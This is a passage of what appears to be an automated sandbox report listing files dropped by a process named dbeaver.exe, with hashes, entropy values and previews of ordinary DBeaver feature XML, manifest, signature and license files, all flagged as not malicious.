      Preview:<?xml version="1.0" encoding="UTF-8"?>. Base for standalone applications. Includes minimum set of plugins -->.<feature. id="org.jkiss.dbeaver.app.local.feature". label="%featureName". version="24.0.0.202403031740". provider-name="%providerName">.. Quick search. Includes minimized ant bundle. No included in non-local as it uses local FS. -->. <plugin id="org.eclipse.text.quicksearch" version="1.2.200.v20230701-1052"/>. <plugin id="org.jkiss.dbeaver.ui.statistics" version="1.0.22.202403031740" />..</feature>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11932
      Entropy (8bit):7.673949347954424
      Encrypted:false
      SSDEEP:
      MD5:2C2EC6606AB283FFFFD878C2F9B6F6F2
      SHA1:A62D5F9F98250F6F888B42D4020477E965947C21
      SHA-256:EF2F6AC97A370B2A35753394AE11CE919038019149F778488867315862FF6728
      SHA-512:C61AAA81966F21D8E9A5398631F12ECE7BB65DB943FE6F39142E19C15847DB42EA15E0A38FF9861F2CFBC8CDCF51762ACE2AD302D119C369BB0B63929E8B2A30
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.83370859440376
      Encrypted:false
      SSDEEP:
      MD5:E832087BEEF659BBE3E8A247999B2454
      SHA1:FEA70552BFAD660B1EAA7D9FDE45FDE14B1705A5
      SHA-256:C63DEB4A6D184A069674FEA70CB53991E722B0FDA583F54C952328E5EAA68BCB
      SHA-512:3A136B37AE79E0D2693D3F3A2EA1D4D035AC32525ADBB7B291FC6EE360A13CD76699393B0846BE9A4C11765B246373B6D91CDEEC05DD0EA8B33A39D5EE689663
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: 5oG//xqz4znaQg5GPJFLXfzmTJsRBWcLfb5iGqXnrDw=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: MomvHws3/klwDvhqukuZE+O1waSLoirkpXxBzdHwxNE=....Name: feature.properties..SHA-256-Digest: KLgXMtsdc3OjwF6YHcU4EBve4PUyFfoTNe7iE6xPNYc=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.616699601939845
      Encrypted:false
      SSDEEP:
      MD5:7AC478E2A51E9F34E2A8553E1092373A
      SHA1:004C2B135218F1DB4D5A14E0CC5392D5169A03E1
      SHA-256:E681BFFF1AB3E339DA420E463C914B5DFCE64C9B1105670B7DBE621AA5E7AC3C
      SHA-512:0A238F08BFDB8EA30132C0504B2C7693B34F9D82866F6301D20DB294CDD3ED016EB313EAE397F9137C12D1F7F2F25F02A33F4C898A8815EB4B14EE6120C19D9C
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: HINbdD5TjcDKXwoXWHQdbDUr/FSok+Wd44jmAB5ZokY=....Name: feature.properties..SHA-256-Digest: 7qCCmO+rWQXeaS0jy7JOVVhChmpQ25/NTM4lJ7yigKI=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):12170
      Entropy (8bit):4.507726497528391
      Encrypted:false
      SSDEEP:
      MD5:4495B28484DFE8F5A5E66D146076D7B6
      SHA1:2D64F5D438FB6AEC9D21A9D32B6C0775FC826F1E
      SHA-256:EEA08298EFAB5905DE692D23CBB24E555842866A50DB9FCD4CCE2527BCA280A2
      SHA-512:C505B7A3ADAE57B6A0537F462FD25448CDEC388F50FE2FC41773A458F67E88963E0A63CB0536EEC7FDD9C6543B43426AA395DAA9614F55B4CDC0B7AF74F9147E
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Community Edition.providerName=DBeaver Corp.description=Universal Database Manager..copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=https://dbeaver.io/product/dbeaver_license.txt.license=\. Apache License\n\. Version 2.0, January 2004\n\. http://www.apache.org/licenses/\n\.\n\. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\.\n\. 1. Definitions.\n\.\n\. "License" shall mean the terms and conditions for use, reproduction,\n\. and distribution as defined by Sections 1 through 9 of this document.\n\.\n\. "Licensor" shall mean the copyright owner or entity authorized by\n\. the copyright owner that is granting the License.\n\.\n\. "Legal Entity" shall mean the union of the acting entity and all\n\. other entities that control, are controlled by, or are under common\n\. control with that entity. For the purposes of this definition,\n
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):809
      Entropy (8bit):4.815132970253847
      Encrypted:false
      SSDEEP:
      MD5:54F184E1D534CF1E93E7FC2FF424147D
      SHA1:C3D94623AA46629192C333EA78B7EB5D5EB59A26
      SHA-256:1C835B743E538DC0CA5F0A1758741D6C352BFC54A893E59DE388E6001E59A246
      SHA-512:7EAF397C926D599FBD868E7439C1335D974A8AC111B6074B2439B8DD1C80AFBA7521DE4ADF768679284B5B887CF9DECBB122C5301B49B533DA40E153B62E646A
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.jkiss.dbeaver.ce.feature". label="%featureName". version="24.0.0.202403031740". provider-name="%providerName". plugin="org.jkiss.dbeaver.ui.app.standalone">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <url>.. </url>.. <includes id="org.jkiss.dbeaver.standalone.feature" version="24.0.0.202403031740"/>. <includes id="org.jkiss.dbeaver.app.local.feature" version="24.0.0.202403031740"/>. <includes id="org.jkiss.dbeaver.ui.extra.feature" version="24.0.0.202403031740"/>.. <plugin id="org.jkiss.dbeaver.ui.app.standalone" version="24.0.0.202403031740"/>..</feature>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11932
      Entropy (8bit):7.674171089582113
      Encrypted:false
      SSDEEP:
      MD5:FBDEF254420549B764D9988DCE3F8D79
      SHA1:E85C16783821A95C0B5D5708E509329D7C6A92BD
      SHA-256:FBCE4B89D95E008E6311F42A4D6E6FE14465AAF553C4B95B2ED5674937DE5A12
      SHA-512:857AE13B6C470AEE7E53C3953FBB92FCC545251968B8E916061C898896C7BB83C6F40987D561F59EDBC394A366C9276604FF77C22231D12192CC0EB3B40C03B2
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.8026496706439525
      Encrypted:false
      SSDEEP:
      MD5:5A8C5FA43BD203DD01B087C5A611F0EA
      SHA1:874AF14E978E25A20093177BEE8B8E5967D5AFA2
      SHA-256:1A3278FBCD60A5D59065B887A887D1C3604050F52DA9EE3448275F76BCB44048
      SHA-512:4ACEE5C11C650B18D06A0FDD3ABC34C0D4205B9F34E2D68FD49267E77AF185EB668D44FFCAC1912A1F5CD07F65604D6242C7FB2195EF7FFBB500C1E0A7B0DDD0
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: 3lD+pGqKgCF88sBKv/fLhf8nKvqNMAeYuok3e5GjPz0=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: tgm3sX8z27xgCmv8lLHacZsTeMM/YQh9p0REWE5mbGA=....Name: feature.properties..SHA-256-Digest: 9m9LLzQ3RoSW3/rG7JmcIsGVCojyNuf4iTeFT3sDl5Q=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.590640612596359
      Encrypted:false
      SSDEEP:
      MD5:7B7BD4339F14113428F419B638E59D52
      SHA1:C8D7CEABA72C975A17E0383FC9C960059EB25BA6
      SHA-256:DE50FEA46A8A80217CF2C04ABFF7CB85FF272AFA8D300798BA89377B91A33F3D
      SHA-512:9ADA4467F5F1D6492C5808A3A935864DF71F37F58C29E2A09D6D42380A8159657D44A77525E100EC37AACDE9D89255FC02BDBB3FF8D25D82274440FD8083EDDB
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: bx1midur7UdutYTwnHl7gbf6q7gGlLxcGjMePbyXsEs=....Name: feature.properties..SHA-256-Digest: NHBfNC3OQ1kKPO7RFk1IOX05YHtKX7rip96EPODiEnU=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):197
      Entropy (8bit):4.887387164602671
      Encrypted:false
      SSDEEP:
      MD5:4E41136B8D6B0EED96B6B8F3F0C1B9CF
      SHA1:F08B10EF561F8E75B7ED0F9B4EFEF023C5333459
      SHA-256:34705F342DCE43590A3CEED1164D48397D39607B4A5FBAE2A7DE843CE0E21275
      SHA-512:EB9544721883393F2591D59F407DFC3D52F9599988A3EAAB86290F14D0D6977F49C5C721E855E5BC1BD86798FEB3293968F05409750F05940CB15CC36CF16B9B
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Databases.providerName=DBeaver Corp.description=DBeaver SQL databases support.copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=https://dbeaver.io/product/dbeaver_license.txt.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):3561
      Entropy (8bit):4.890979375243547
      Encrypted:false
      SSDEEP:
      MD5:EDF72A8FDB27ECD6B4786D1B074BBEBE
      SHA1:BA5BD601F8E33EA76167ED1EF0E04476930A8C30
      SHA-256:6F1D6689DBABED476EB584F09C797B81B7FAABB80694BC5C1A331E3DBC97B04B
      SHA-512:BD0D0BEF03A37169A2FBF38735EAB13C3A5C0FA7F65811F2D8AE070FD05D2E214C3A139BFB5F04DC1A531D851244E21725FA5F723F514F0BD8A206FEE5B14107
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.jkiss.dbeaver.db.feature". label="%featureName". version="1.0.117.202403031740". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <plugin id="org.jkiss.dbeaver.ext.db2" version="2.1.211.202403031740"/>. <plugin id="org.jkiss.dbeaver.ext.mysql" version="2.1.211.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.mssql" version="1.0.220.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.oracle" version="2.1.211.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.postgresql" version="2.1.199.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.generic" version="2.3.212.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.athena" version="1.0.132.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.bigquery" version="1.0.132.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.clickhouse" version="1.0.131.2024030
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11931
      Entropy (8bit):7.676236409341831
      Encrypted:false
      SSDEEP:
      MD5:EB58AA829A00B4E4D3C6A4AB4E6EFE7F
      SHA1:BC2A7D56285887B66B4E471091F9E1E7BF3393F5
      SHA-256:E611619E5F7547AC1F1B990C429B33E7876CB1BD0F198EED3304FAAEB1DB9CD7
      SHA-512:38891D3178AC51BCF8A4C43269E39EB7C601434815A5F5FA5B2494AD18317BC097C395A26B366C8B144D6775CD80C024048A65091897E1749F9E6B8F66627A1C
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.809261029086025
      Encrypted:false
      SSDEEP:
      MD5:949DF48B6E47AE6ADABBA58CF86AEAC7
      SHA1:E58395BDBAE002F21E595F18ACF8BEAA97D40F38
      SHA-256:155F90385A32DB98B2A448DADAAA091D42AB40CAA02082A6974F9B57C49CC4FE
      SHA-512:CB82C6C2B4CED5BC6A28C8C38838B4CA07A8AAA156A151E3E48D2D9C42DE4EE5E4F2C9F1E335878422FE24EFF87F3CB1BF228054BA62267200C477258E98ECB0
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: Yblw2Z9fQ9EF+Buk13EHR3brnWczs7aP+RKpA6Qy7e0=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: feature.xml..SHA-256-Digest: AQjBIxLte7+B6NkM+BBSGGwu2FcnFeXleNcR6JlezSI=....Name: feature.properties..SHA-256-Digest: wCxo+QU6HR1YWH05bTXnY8EhD+Sa971JT9VhsmUq/aQ=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):290
      Entropy (8bit):5.6637783919319284
      Encrypted:false
      SSDEEP:
      MD5:C1EDA344D3F8D64E902BD3E197083ADA
      SHA1:19F7BB9945CED5E2F9F98E2D3A5C9E7B6BD334A2
      SHA-256:61B970D99F5F43D105F81BA4D771074776EB9D6733B3B68FF912A903A432EDED
      SHA-512:3934B60BEFBCED2495D31CA08899E52EBFFF33CFF0CDD447E31466A7C27EDEE0DB2EFC64FBA755A77CBC9A56C8D4155923BB3F6841F83F35CF5EE12AAB8811A0
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: feature.xml..SHA-256-Digest: 1J5K8ZdGm8GlrwWbgwXu8MjFaNuJqns6/2n2FQlnAs0=....Name: feature.properties..SHA-256-Digest: Zd93Xfdlv8EkyCSc5kL8hgfOfAPEYyPwKObrMKJRFXc=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):195
      Entropy (8bit):4.9464200623400005
      Encrypted:false
      SSDEEP:
      MD5:235AA08FE899ED0D2DD02AD1051C895B
      SHA1:164E1D940B597D664668713FD13D4FFDAE317AE0
      SHA-256:65DF775DF765BFC124C8249CE642FC8607CE7C03C46323F028E6EB30A2511577
      SHA-512:5E3B341D35BE80C4AC098581EF15B9D4AD201DA38B2C8AB1E2422519C56F98BBC800AA94EA23414B1693DEE88E41494D27E337ADA8F7C1345F2257F536C98201
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver Databases UI.providerName=DBeaver Corp.description=DBeaver SQL databases UI.copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=https://dbeaver.io/product/dbeaver_license.txt.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):2032
      Entropy (8bit):4.923029448157332
      Encrypted:false
      SSDEEP:
      MD5:AC506314920322DC520ABE766BFC9DD7
      SHA1:E710FE806D8621EB393DE6666E7DBA1304EDF202
      SHA-256:D49E4AF197469BC1A5AF059B8305EEF0C8C568DB89AA7B3AFF69F615096702CD
      SHA-512:C3A7D7DF04C2370A34682181B767F282D07F03616255AD07F6FB59B285B25890B0E573DA1B0411CCF0E0F917C0FBD6E88C23EB832FF696A6DACEAD42E21AEF5B
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.jkiss.dbeaver.db.ui.feature". label="%featureName". version="1.0.117.202403031740". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <includes id="org.jkiss.dbeaver.db.feature" version="1.0.117.202403031740"/>.. <plugin id="org.jkiss.dbeaver.ext.mysql.ui" version="1.0.118.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.dameng.ui" version="1.0.10.202403031740"/>. <plugin id="org.jkiss.dbeaver.ext.db2.ui" version="1.0.51.202403031740"/>. <plugin id="org.jkiss.dbeaver.ext.exasol.ui" version="1.0.95.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.hana.ui" version="1.0.79.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.mssql.ui" version="1.0.125.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.oracle.ui" version="1.0.113.202403031740" />. <plugin id="org.jkiss.dbeaver.ext.oceanbase.ui" version="1
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11931
      Entropy (8bit):7.676847979069369
      Encrypted:false
      SSDEEP:
      MD5:A359775E3E421557330ABFA431C3471F
      SHA1:99FCCDEB4FB97D82C5A5FAEC9B55777B87C8A71D
      SHA-256:AA2D272A1761D8EE7A89947738CEF71CCE639A674C4DC5B2CB388644595BB42A
      SHA-512:63250122D6F7BF4A0C84EFF9006A5CBD6240130644340FE83D44F77F361BCCA54D93E853F95C772564311395C9C2BE27E799B4FE238DF295BD3811B33B1F0658
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):484
      Entropy (8bit):5.792602229869762
      Encrypted:false
      SSDEEP:
      MD5:F977564B17F89A1C2EC3F46242DF06AB
      SHA1:16F428A4E26D5C318BA43199D5D21DF8CD9950DC
      SHA-256:F3440629B036DF06A942F9432B358C2D6CCB8968503FD3AF566ADF49146E83DC
      SHA-512:2DF1CA51777A769BDE6A067F0F8514970123B32D0FD50E83F178FDC6E12D1AF4887AAE382698BAFC6DA9E76D3C6141C3BEACC6AEBFEAD5A6D55BA6C8CCD03CCE
      Malicious:false
      Reputation:unknown
      Preview:Signature-Version: 1.0..Created-By: 17.0.9 (Private Build)..SHA-256-Digest-Manifest: fWoAEGNZJme7X3UCmqWZcumxdDu5JkTixfaFSFdjS8k=..SHA-256-Digest-Manifest-Main-Attributes: oFu1MrphNLFMMhK62/+IJZUZ+NWhyyy.. VG88sfgEJhYY=....Name: build.properties..SHA-256-Digest: V7whisuFtSd6hrFg1qWa8YBBwRGdCb+jHWvEiVQBTss=....Name: feature.xml..SHA-256-Digest: aYAUku4/1vrjacvZJbACCP5fEcjsNW24rqiHEpqNaN8=....Name: feature.properties..SHA-256-Digest: Ql6bPonXg0BWHmwv/laE1JDfTjuDppNfU5SloZiREvM=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):378
      Entropy (8bit):5.7383463249809745
      Encrypted:false
      SSDEEP:
      MD5:BCE6F0D0BF6F995864265AEC1E845EAA
      SHA1:068AFAFCA3C0DEAF5706126E67E61532951855B9
      SHA-256:7D6A001063592667BB5F75029AA59972E9B1743BB92644E2C5F6854857634BC9
      SHA-512:8E46CB2116E6036DF519D96A98C0512BE13BEE5AEF19A360F117046642EED38B76BC5ED2E28D8F1EDB5F4F8441AB91D94B11FDFB25D15E0E0DAA3CAE14003B22
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Build-Jdk-Spec: 17..Build-Time: 202403031740..Built-By: dbeaver.io..Created-By: dbeaver.io....Name: build.properties..SHA-256-Digest: emrxY0WOD+gBtNhVsmOHO4NdknPx/8SpCLrmZQL4YMQ=....Name: feature.xml..SHA-256-Digest: ZbwYMlhuzc6ujZIBpPiEuv1JscG3dSGTbZTC47CUyoc=....Name: feature.properties..SHA-256-Digest: aQ1LaK9MaI1ORQMFYAkgX9ztsrUzjth/nCXsBIvPZE4=....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):64
      Entropy (8bit):4.2006481953738835
      Encrypted:false
      SSDEEP:
      MD5:E9017792FDCDFF5F2F07794ED854B45E
      SHA1:043C740F253E607BBD01490D32979E3839F3CF7B
      SHA-256:7A6AF163458E0FE801B4D855B263873B835D9273F1FFC4A908BAE66502F860C4
      SHA-512:B3D07D64A10B6C6B2AD882A5AA660D7D399AB4D006944AB09C568CF2E20EBB0998CB0FC6925FD67FFBE871039AC6EA30F861F4028AAE8C77FC81548450E728C9
      Malicious:false
      Reputation:unknown
      Preview:bin.includes = build.properties,feature.xml,feature.properties..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):12156
      Entropy (8bit):4.508871509662555
      Encrypted:false
      SSDEEP:
      MD5:7F090997DC16CC6D66455F1492B5A0E8
      SHA1:4406F0FA27EF8422395CED148873640F1102BBEE
      SHA-256:690D4B68AF4C688D4E4503056009205FDCEDB2B5338ED87F9C25EC048BCF644E
      SHA-512:410EFB882EB9C0F5D11EA17C373871FB90D00156B376FF730716AD92B38DA3A73D6E80AC2789478D46C51F479BC1F3D764E6001E5A4E1092AE5E57775F5249C1
      Malicious:false
      Reputation:unknown
      Preview:featureName=DBeaver RCP.providerName=DBeaver Corp.description=Universal Database Manager RCP..copyright=\u00A9 2010-2024, DBeaver Corp.licenseURL=../../docs/licenses/dbeaver_license.txt.license=\. Apache License\n\. Version 2.0, January 2004\n\. http://www.apache.org/licenses/\n\.\n\. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\.\n\. 1. Definitions.\n\.\n\. "License" shall mean the terms and conditions for use, reproduction,\n\. and distribution as defined by Sections 1 through 9 of this document.\n\.\n\. "Licensor" shall mean the copyright owner or entity authorized by\n\. the copyright owner that is granting the License.\n\.\n\. "Legal Entity" shall mean the union of the acting entity and all\n\. other entities that control, are controlled by, or are under common\n\. control with that entity. For the purposes of this definition,\n\. "control"
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):765
      Entropy (8bit):4.885712684368677
      Encrypted:false
      SSDEEP:
      MD5:1D57F11C16306AE05B32EDF56D6BF03A
      SHA1:17486EA882C75122DD136E6BF51B13449FE91D46
      SHA-256:65BC1832586ECDCEAE8D9201A4F884BAFD49B1C1B77521936D94C2E3B094CA87
      SHA-512:A781BBF0DCE83AF9360BD33A39C7EEC02A0245199D2CE91372F991F81F7742F7ACB0909AFD5EC3E87300E2C1DD8F0A31D00E7AEE30E27AA52D84B9FDA22EE8C9
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<feature. id="org.jkiss.dbeaver.rcp.feature". label="%featureName". version="3.0.5.202403031740". provider-name="%providerName">.. <description>. %description. </description>.. <copyright>. %copyright. </copyright>.. <license url="%licenseURL">. %license. </license>.. <includes id="org.eclipse.rcp" version="4.30.0.v20231201-0512"/>.. <plugin id="org.eclipse.ui.intro" version="3.7.200.v20231106-1240" />. <plugin id="org.eclipse.ui.themes" version="1.2.2300.v20230807-1354"/>. <plugin id="com.ibm.icu.base" version="58.2.0.v20170418-1837"/>. Network -->. <plugin id="org.eclipse.ui.net" version="1.5.200.v20231106-1240"/>..</feature>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:data
      Category:dropped
      Size (bytes):11930
      Entropy (8bit):7.674675165980106
      Encrypted:false
      SSDEEP:
      MD5:59234D6E143D08AD3198CD73A73329BA
      SHA1:D31859A839AA54ECABB27469BA9D028F6E78D48E
      SHA-256:40BBF76EC157E8B3B4DA83ECA4B9417576628E308B321CD0DDA127BFF513966B
      SHA-512:1AC8EBF884972FEADECDE8229E85EB926E9AC8863E512A561175F6EE2FCA96E767E2A08AD4D974F3E3C0ADB4A36C087481154F238AD5F39105F6DEDD21A431FE
      Malicious:false
      Reputation:unknown
      Preview:0.....*.H..........0......1.0...`.H.e......0...*.H..........0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):396
      Entropy (8bit):5.798059848989546
